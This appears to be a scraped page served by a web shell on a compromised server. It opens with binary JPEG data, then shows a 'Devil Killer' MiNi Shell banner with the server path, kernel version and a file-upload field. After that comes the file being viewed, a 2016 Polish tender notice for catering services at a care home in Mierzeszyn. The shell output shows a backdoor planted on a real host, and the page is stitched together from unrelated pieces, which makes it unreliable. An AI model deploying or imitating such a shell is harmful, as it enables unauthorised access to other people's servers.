JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160303/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160303/47786-N-2016.html

<p class="kh_header"><b>Mierzeszyn: Świadczenie usług gastronomicznych w Domu Pomocy Społecznej LEŚNY w Zaskoczynie tj. przygotowywanie całodziennych posiłków dla mieszkańców z uwzględnieniem diet i kaloryczności, w oparciu o istniejące zaplecze kuchenne.</b><br>
<b>Numer ogłoszenia: 47786 - 2016; data zamieszczenia: 03.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej LEŚNY , 83-041 Mierzeszyn, woj. pomorskie, tel. 0-58 6828114, faks 0-58 6828114.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-gdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług gastronomicznych w Domu Pomocy Społecznej LEŚNY w Zaskoczynie tj. przygotowywanie całodziennych posiłków dla mieszkańców z uwzględnieniem diet i kaloryczności, w oparciu o istniejące zaplecze kuchenne..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usług gastronomicznych w Domu Pomocy Społecznej LEŚNY w Zaskoczynie, tj. przygotowywanie przez Wykonawcę
całodziennych posiłków dla mieszkańców z uwzględnieniem diet i kaloryczności, w wynajmowanych na ten cel pomieszczeniach kuchennych Zamawiającego wraz  z wyposażeniem w okresie 01.05.2016 - 31.12.2016. Szacunkowa ilość - 24.500 osobodni, przy założeniu, że przez cały okres obowiązywania umowy w Domu Pomocy Społecznej przebywa 100 mieszkańców .  Zamawiający oświadcza, że wskazana ilość jest maksymalną  ilością mieszkańców, która może przebywać w DPS-ie.  Rzeczywista  ilość osobodni w ramach zamówienia wynikać będzie z bieżących potrzeb Zamawiającego.  Aktualnie w Domu Pomocy Społecznej LEŚNY w Zaskoczynie przebywa 100 osób , w tym w pawilonie mieszkalnym przebywa 58 osób, a w skrzydle budynku głównego 42 osoby.  (zestawienie wydanych posiłków w okresie  01/2015 do 12/2015 r. stanowi zał. nr 11 do SIWZ). Ilość osób a zatem posiłków może ulec zmianie.
2.Wykonawca powinien zapewnić codzienne posiłki o ustalonych porach dnia:
- Śniadanie                          8.00 - 10.00,
- II śniadanie                     11.00,
- Obiad                              12.00 - 14.00,
- Podwieczorek                 16.00,
- Kolacja                            18.00 - 20.00.
Drugie śniadanie i podwieczorek przeznaczone są dla osób, które zaleceniem lekarza muszą być dożywiane częściej, ale w małych ilościach (niedowaga, cukrzyca itp.). Obecnie dodatkowo dożywianych w ten sposób są 24 osoby, liczba tych osób może być zmienna.
Zamawiający nie godzi się na dowóz gotowych posiłków z zewnątrz.
3.Zalecane normy kalorii i składników pokarmowych obliczone na osobodzień:
Kalorie ok. 2200 -2400,
Węglowodany ok. 300 g,
Białko ogółem 70 g, w tym białko zwierzęce ok. 20 - 30 g,
Tłuszcz ok. 70 g,
Białko powinno pokrywać od 13 - 16 % całodobowego zapotrzebowania kalorycznego, tłuszcze nie więcej niż 30 % całodobowego zapotrzebowania kalorycznego natomiast reszta kalorii powinna zostać pokryta przez węglowodany.
Wykonawca zobowiązany będzie do przestrzegania normatywnych wartości energetycznych, wartości odżywczych i smakowych potraw oraz do przygotowywania jadłospisów przy uwzględnieniu  produktów sezonowych.
Posiłki muszą być przygotowane z surowców wysokiej jakości, urozmaicone, bez stosowania dodatkowych preparatów zastępczych oraz środków konserwujących  w szczególności:
- bez używania produktów typu instant oraz gotowych produktów np.: pierogi mrożone, pyzy, klopsy, gołąbki itp.; 
 - używania masła na  śniadanie/kolacje, a nie produktów masłopodobnych;
 - używania wędlin i mięsa wysokiej jakości.
4.Posiłki powinny uwzględniać  zestaw dietetyczny:
a)dieta podstawowa,
b)dieta łatwostrawna
c)dieta wątrobowa,
d)dieta cukrzycowa,
e)dieta płynna  np.: miksowana, kleik.
f)dieta bezmleczna,
g)dieta bezglutenowa
Wykonawca zobowiązany jest podczas trwania umowy do realizacji jadłospisów przy poszczególnych dietach według zaleceń lekarza odnośnie kaloryczności posiłków.
5.Sporządzanie  posiłków w ilościach wynikających ze stanu mieszkańców z uwzględnieniem zaleceń dietetycznych,  musi odbywać się na bieżąco, ze świeżych produktów, w pomieszczeniach kuchni Domu zgodnie z wymaganiami określonymi odpowiednio  w przepisach tj.:                                                                                                      Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności  i żywienia Dz. U. z 2015 r. poz. 594 z późn. zm. i innych, w tym zakresie jak również  z zaleceniami Instytutu Żywności i Żywienia oraz weźmie odpowiedzialność za ich przestrzeganie (zasady GMP, GHP, HACCP). Wykonawca udostępni na wniosek Zamawiającego dokumenty potwierdzające wprowadzenie HACCP, GHP, GMP. Wykonawca powinien posiadać księgę HACCP wraz z prowadzonymi zapisami.
- Rozporządzenia Ministra Zdrowia w sprawie pobierania i przechowywania próbek żywności przez zakłady żywienia zbiorowego typu zamkniętego z dnia 17 kwietnia 2007 r. Dz. U. Nr 80, poz. 545),
Pracownicy biorący udział w przygotowaniu i produkcji posiłków zobowiązani są do posiadania aktualnych zaświadczeń o dopuszczeniu do pracy oraz zaświadczeń do celów sanitarno-epidemiologicznych, potwierdzających dopuszczenie do pracy przez lekarza. Wykonawca udostępni na każde żądanie Zamawiającego ww. dokumenty do wglądu. Wykonawca jest zobowiązany do wyposażenia pracowników biorących udział przy realizacji zamówienia w odpowiednie obuwie, odzież roboczą i ochronną, zgodnie z przepisami BHP i obowiązującymi normami w tym zakresie.
6.Wykonawca zobowiązany jest do udostępnienia upoważnionemu przedstawicielowi    Zamawiającego jednej porcji każdego posiłku do degustacji w zakresie diety podstawowej  w celu dokonania kontroli jakości i gramatury.
7. Wyznaczony pracownik Zamawiającego będzie sprawować nadzór nad jakością,  ilością i przestrzeganiem obowiązujących norm przy sporządzaniu posiłków. W przypadku zakwestionowania jakości, ilości i zgodności z normami posiłków Zamawiający ma prawo odmówić ich przyjęcia i żądać dostarczenia posiłków odpowiadających jakością, ilością i zgodnością z normami na koszt Wykonawcy.
8. Przygotowywane posiłki będą odbierane przez pracowników Zamawiającego, w oknie podawczym na stołówkę w budynku głównym, jak również w pawilonie mieszkalnym. Dostarczenie i wydawanie posiłków do pawilonu mieszkalnego (budynek wolnostojący nie jest połączony z budynkiem głównym) odbywać się będzie przy użyciu urządzenia typu bemar przez pracowników Wykonawcy. Rozdanie mieszkańcom posiłków, a  następnie zwrot brudnych naczyń, należy do pracowników Zamawiającego. Wykonawca zobowiązany będzie do mycia wraz z  wyparzaniem całości wydanych naczyń i sztućców.
9. Zamawiający zapewni naczynia stołowe i sztućce oraz niezbędny sprawny technicznie sprzęt kuchenny w dniu rozpoczęcia świadczenia przedmiotu zamówienia. Wykonawca zobowiązany jest do bieżącego uzupełniania naturalnych ubytków na swój koszt w okresie trwania umowy. Wykonawca zapewnia we własnym zakresie pozostałe, oprócz wynajmowanych, urządzenia i naczynia niezbędne do wykonania usługi. Zakupiony przez Wykonawcę dodatkowy sprzęt kuchenny, o którym mowa w zdaniu poprzedzającym stanowi  jego własność. 
10. Zgodnie z Rozporządzeniem Ministra Polityki Społecznej z dnia 23 sierpnia 2012 r.  w sprawie domów pomocy społecznej (Dz. U. z 27 sierpnia 2012 r., poz. 964)  Wykonawca wyposaży kuchenki w oddziałach (2 w budynku głównym, 1 w pawilonie mieszkalnym) w podstawowe produkty żywnościowe i napoje w postaci: pieczywa, tłuszczy, przetworów, herbaty.
Ponadto na kulinarną terapię zajęciową należy zapewnić produkty do wypieku ciast i słodycze o wartości nie przekraczającej 350 zł brutto miesięcznie, zgodnie ze złożonymi zamówieniami przez upoważnionego pracownika Zamawiającego. Przygotowywanie ciast do wypieku odbywa się na stołówce, a wypiek odbywać się będzie w piekarniku znajdującym się w pomieszczeniu kuchni. 
11.Wykonawca udostępni płatne posiłki pracownikom Domu, którzy się o to zwrócą   i chętnym osobom w ramach tzw. usług środowiskowych. Opłaty za te posiłki ponoszą osoby je zamawiające uiszczając bezpośrednio u Wykonawcy. Na dzień dzisiejszy nikt nie korzysta z płatnych posiłków.
12.Wykonawca zobowiązany będzie do sporządzania jadłospisów z określeniem gramatury dla wszystkich produktów i potraw zgodnie z zasadami    żywienia    i dietetyki stosowanej opracowanymi przez Instytut Żywności i Żywienia. Posiłki powinny pokrywać całodobowe zapotrzebowanie na kalorie i podstawowe składniki odżywcze tj. białka, tłuszcze, węglowodany, witaminy oraz sole mineralne. 
Posiłki, które nie spełniają norm ilościowych czy jakościowych, będą przez Zamawiającego zakwestionowane , natomiast Wykonawca zostanie zobowiązany do prawidłowego (zgodnego z normami) przygotowania tych posiłków.
Wykonawca zobowiązany jest do pobierania i przechowywania próbek żywnościowych zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 17 kwietnia 2007 r. w sprawie pobierania i przechowywania próbek żywności przez zakłady żywienia zbiorowego typu zamkniętego (Dz. U. Nr 80, poz. 545).
13. Dekadowy jadłospis winien być przedstawiony z 3-dniowym wyprzedzeniem do akceptacji osobie wyznaczonej do tego celu przez Zamawiającego. O ewentualnych zmianach   w jadłospisie należy niezwłocznie powiadomić Zamawiającego. (przykładowy jadłospis dekadowy stanowi załącznik nr 13 do SIWZ).
14. W ramach tzw. wsadu do kotła należy uwzględnić znaczne rozszerzenia menu na Boże Narodzenie, a także posiłki  na imprezy okolicznościowe np.: festyny, zabawy integracyjne itp. - załącznik nr 10 do SIWZ). Liczba zaproszonych gości uzgadniana będzie każdorazowo pomiędzy Wykonawcą a Zamawiającym (nie więcej niż 50 osób). Imprezy okolicznościowe rozliczane będą dodatkowo wg. ilości osób biorących udział w planowanych imprezach.
15.Wykonawca musi prowadzić ewidencję ilościowo-wartościową wydanych posiłków   z podziałem na poszczególne diety, o których mowa w ust. 4 niniejszego paragrafu. 
16. Ilość potrzebnych posiłków z podziałem na diety, o których mowa w ust. 5 zgłaszana będzie pisemnie przez Zamawiającego do godziny 10.00 dnia poprzedniego i korygowana będzie do godziny 8.00 dnia bieżącego.     
17. Wysokość tzw. wsadu do kotła średnio w skali miesiąca nie może być niższa niż: 9,00 zł  netto na jedną osobę dobowo. (przykładowy jadłospis przy wsadzie do kotła 9 zł netto stanowi zał. nr 14 do SIWZ).
18.Zamawiający zastrzega sobie prawo do wglądu do dokumentacji źródłowej np.: faktur zakupu, kartotek magazynowych itp.
19.Zamawiający bezwzględnie wymaga, aby na drugie danie obiadowe przy diecie ogólnej wystąpiło:
- co najmniej 5 razy w dekadzie potrawa mięsna (schab, pieczeń wieprzowa, pulpety lub mięso drobiowe (wyłącznie udka lub filety),
- 2 razy w dekadzie filet z ryby bez ości,
- 5 raz w dekadzie ciepłe kolacje (minimum),
oraz 5 razy w dekadzie ciepłe śniadania (minimum).
20.Potrawy należy przygotowywać w tym samym dniu i nie można przetrzymywać ich do dnia następnego.
21.W przypadku niewykorzystania przez mieszkankę pełnego osobodnia żywienia do rozliczeń przyjmuje się:
a)koszt śniadania i drugiego śniadania    - 25% stawki osobodnia żywienia,
b)koszt obiadu                           	        - 55% stawki osobodnia żywienia,
c)koszt podwieczorku i kolacji                - 20% stawki osobodnia żywienia.
22.Odpady pokonsumpcyjne Wykonawca zagospodaruje we własnym zakresie, zachowując sposób transportu, przechowywania zgodnie z obowiązującymi przepisami. 
23.Warunkiem świadczenia usług gastronomicznych dla Domu jest wynajęcie pomieszczeń kuchennych wraz z elementami stałego wyposażeniem, o łącznej powierzchni: 165,25 m2. W skład pomieszczeń kuchennych wchodzą: pomieszczenie wstępnej obróbki wraz z obieralnią warzyw, kuchnia właściwa, zmywalnia naczyń. Zamawiający informuje, iż pomieszczenia kuchenne wyposażone są w media takie jak: zimna woda, ciepła woda, energia elektryczna, wentylacja grawitacyjna i mechaniczna, drożna kanalizacja, winda do transportu posiłków, podlegająca Dozorowi Technicznemu - opłaty za konserwację i przeglądy windy ponosi Zamawiający. Pomieszczenia nie są przystosowane do potrzeb osób niepełnosprawnych. 
Na wymienioną powierzchnię składają się:   
Kuchnia główna                      76,00 m2
Magazynek kuchni                  16,00 m2
Magazyn spożywczy               64,00 m2
Szatnia personelu                      6,30 m2  
WC kuchni                                2,95 m2
Wykaz pomieszczeń i wyposażenia stanowi załącznik do umowy najmu.
Zestawienie opłat za media w okresie 01/2015 do 12/2015 stanowi zał. nr 12 do SIWZ
24.Za wynajem od Domu pomieszczeń o powierzchni 165,25 m2 Wykonawca zapłaci    miesięcznie czynsz w wysokości 4065,15 zł netto. 
Za wynajem stałego i ruchomego wyposażenia kuchni przejętego protokołem zdawczo-odbiorczym Wykonawca zapłaci czynsz miesięczny w ryczałtowej wysokości 550,00 zł netto.  
Zamawiający nie jest aktualnie podatnikiem podatku VAT, w związku z czym wskazane wyżej kwoty miesięcznego czynszu nie uwzględniają podatku VAT, ani do tej kwoty nie jest doliczany VAT.  W  przypadku gdy Zamawiający stanie się podatnikiem podatku VAT, do wskazanych wyżej kwot  miesięcznego czynszu zostanie doliczony podatek VAT w ustawowej wysokości. 
25.Wykonawca uiści dodatkowe miesięczne opłaty Zamawiającemu za:
- energię elektryczną według wskazań podliczników i aktualnych stawek brutto ustalanych  
 przez dostawcę energii ,
- wodę według wskazań podliczników i  stawki za 1m3 za wodę w wysokości 4,48 zł brutto, 
- ogrzewanie wynajmowanych pomieszczeń, podgrzewanie wody (c.w.u.), oraz za odprowadzone  ścieki,  w   łącznej   wysokości  ryczałtowej 650  zł  miesięcznie, 
 -wywóz nieczystości stałych za 1 m3 (wydzielony jeden pojemnik dla potrzeb Wykonawcy) według aktualnych stawek brutto usługodawcy t.j. 315,00 zł,                                               
 - tel / fax, według wydruku centrali abonenckiej Zamawiającego, według   obowiązujących   stawek brutto usługodawcy,  
 - podatek od nieruchomości od wynajmowanej powierzchni według aktualnej stawki podatku od nieruchomości określonej we właściwej uchwale Rady Gminy Trąbki Wielkie. Na dzień ogłoszenia przetargu stawka ta wynosi  7,68 zł  za 1 m2 rocznie.
Zamawiający zastrzega sobie prawo zmiany wysokości opłat eksploatacyjnych za dostarczane media w przypadku zmiany cen dostaw mediów przez Dostawców oraz w przypadku wprowadzenia nowych stawek podatku od nieruchomości.  
26.Wykonawca odpowiada za wynajmowane pomieszczenia, urządzenia i naczynia, dokonując niezbędnych napraw na własny koszt i uzupełnia na bieżąco braki w wynajmowanych zasobach, jeśli występują.
27.Szczegółowe warunki umowy najmu zostały określone we wzorze stanowiącym  załącznik nr 6 do SIWZ.
28. Wykonawca zapewnia we własnym zakresie pozostałe, oprócz wynajmowanych,  urządzenia  i naczynia niezbędne do wykonania usługi.
29. Na Wykonawcy spoczywa obowiązek  dostosowania kuchni i przestrzegania wymogów Sanepidu, HACCP oraz uzyskania w ciągu 30 dni od daty rozpoczęcia działalności w pomieszczeniach kuchennych DPS decyzji Państwowego Powiatowego Inspektora Sanitarnego w Pruszczu Gdańskim o zatwierdzeniu zakładu. Po otrzymaniu ww. decyzji należy ją przedstawić Zamawiającemu. Zamawiający w każdej chwili może wnioskować o przeprowadzenie kontroli Sanepidu.
UWAGA: Oferenci winni dokonać wizji lokalnej pomieszczeń i wyposażenia kuchni oraz zaplecza przed złożeniem oferty.
30.Obowiązkiem Wykonawcy jest dostarczenie dla Zamawiającego kserokopii protokołów z kontroli (stanu sanitarnego pomieszczeń, posiłków) Sanepidu, PIP. Za uchybienia ujawnione w trakcie kontroli np. Sanepidu wynikające ze świadczonej przez Wykonawcę usługi, której następstwem będą m.in. mandaty, kary, odpowiada Wykonawca.
31.Wszelkie modernizacje pomieszczeń i instalacji, wykonywane przez Wykonawcę, muszą być uzgodnione z Zamawiającym. Wszelkie nakłady za poniesione prace pokrywa Wykonawca.
32. Rozliczenia finansowe z Wykonawcą będą odbywały się w miesięcznych okresach rozliczeniowych (po zakończeniu miesiąca kalendarzowego) na podstawie rozliczeń wydanych posiłków. Będą się one odbywały według wzoru:
Cena brutto jednego osobodnia żywienia (wynikająca z oferty Wykonawcy stanowiący załącznik nr 1)  x   ilość faktycznie wydanych posiłków całodziennych w danym miesiącu
33. Wypłata tak wyliczonego wynagrodzenia za wykonaną usługę, będzie następowała po upływie każdego miesiąca, w terminie 21 dni od daty otrzymania prawidłowo wystawionej faktury od Wykonawcy, przelewem na jego konto bankowe.                                                           
34.Zamawiający dopuszcza zatrudnienie podwykonawcy/dalszych podwykonawców, zgodnie z art. 36a ust.1 Ustawy.
Jednocześnie Zamawiający na podstawie art. 36a ust.2. pkt 1, zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia tj usługi przygotowania i gotowania posiłków. 
35. W przypadku zatrudnienia podwykonawcy/dalszych podwykonawców, w oparciu o art. 36b ust. 1 Ustawy Zamawiający żąda wskazania przez Wykonawcę w ofercie informacji na temat części zamówienia, których wykonanie zamierza powierzyć podwykonawcom (wzór zał. nr 9 do SIWZ). 
UWAGA: Oferenci winni dokonać wizji lokalnej pomieszczeń i wyposażenia kuchni oraz zaplecza przed złożeniem oferty..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zgodnie z  art. 36 ust. 2, pkt. 3 ustawy, Zamawiający przewiduje możliwość udzielenia 
ewentualnych zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy PZP.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6, 55.32.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wadium wnosi się przed upływem terminu składania ofert.
2.Wykonawca zobowiązany jest do wniesienia wadium w wysokości 10.000,00 zł (słownie: dziesięć tysięcy złotych 00/100 ) najpóźniej w dniu składania ofert przed godz. 11.30 dnia 15.03.2016 r.W przypadku jeżeli do godz. 11:30 dnia 15.03.2016r . nie wpłynie wymagana kwota wadium na konto Zamawiającego, będzie to oznaczało, że wadium nie zostało wniesione.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy wykażą się prowadzeniem działalności gospodarczej w zakresie świadczenia usług gastronomicznych, a w przypadku podmiotu mającego siedzibę poza granicami RP - zezwolenie właściwego organu na prowadzenie takiej działalności.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek za spełniony, gdy Wykonawcy wykażą się wykonaniem w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - tym okresie,  minimum 2 usług, odpowiadających swym rodzajem i wartością usług stanowiących przedmiot zamówienia- usługi gastronomiczne w zakresie przygotowywania całodziennych posiłków (z podaniem ich rodzaju i wartości oraz daty wykonania i podmiotów na rzecz których usługi zostały wykonane) o wartości  nie mniejszej niż 150.000 zł każda. Usługi nie mogą dotyczyć wykonywania usług cateringowych.Do Wykazu (załącznik nr 4 do SIWZ) należy dołączyć dowody potwierdzające czy  usługi zostały wykonane lub są wykonywane należcie .
UWAGA:
Dowodami, o których mowa w ust. VII ust. pkt.2 są:
- poświadczenia, z tym że  w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
- oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek za spełniony jeżeli Wykonawca wykaże, że oddeleguje do wykonania przedmiotu zamówienia: osobę pełniąca obowiązki szefa kuchni, posiadającą wykształcenie gastronomiczne i doświadczenie zawodowe na stanowisku szefa kuchni (minimum 3 lata) oraz  niezbędny personel kuchenny do prawidłowego wykonania przedmiotu zamówienia.W  celu  potwierdzenia  spełnienia  tego  warunku  Wykonawca  zobowiązany  jest wypełnić oświadczenie (załącznik nr 7 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek za spełniony, gdy Wykonawca wykaże, iż posiada opłaconą   polisę,   a   w   przypadku   jej   braku   innego   dokumentu  potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej 300.000 zł. Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, (niezależnie od charakteru prawnego łączących go z nimi stosunków) zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Ww. zobowiązanie musi zostać załączone do oferty przetargowej w oryginale.</p>
</li></ul></li></ul>
